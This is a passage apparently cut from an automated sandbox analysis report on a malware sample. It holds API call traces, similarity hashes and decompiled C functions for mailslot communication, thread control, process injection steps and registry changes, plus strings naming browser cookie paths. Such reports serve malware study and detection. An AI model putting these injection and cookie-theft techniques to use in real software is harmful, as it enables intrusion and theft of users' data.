  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}


APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
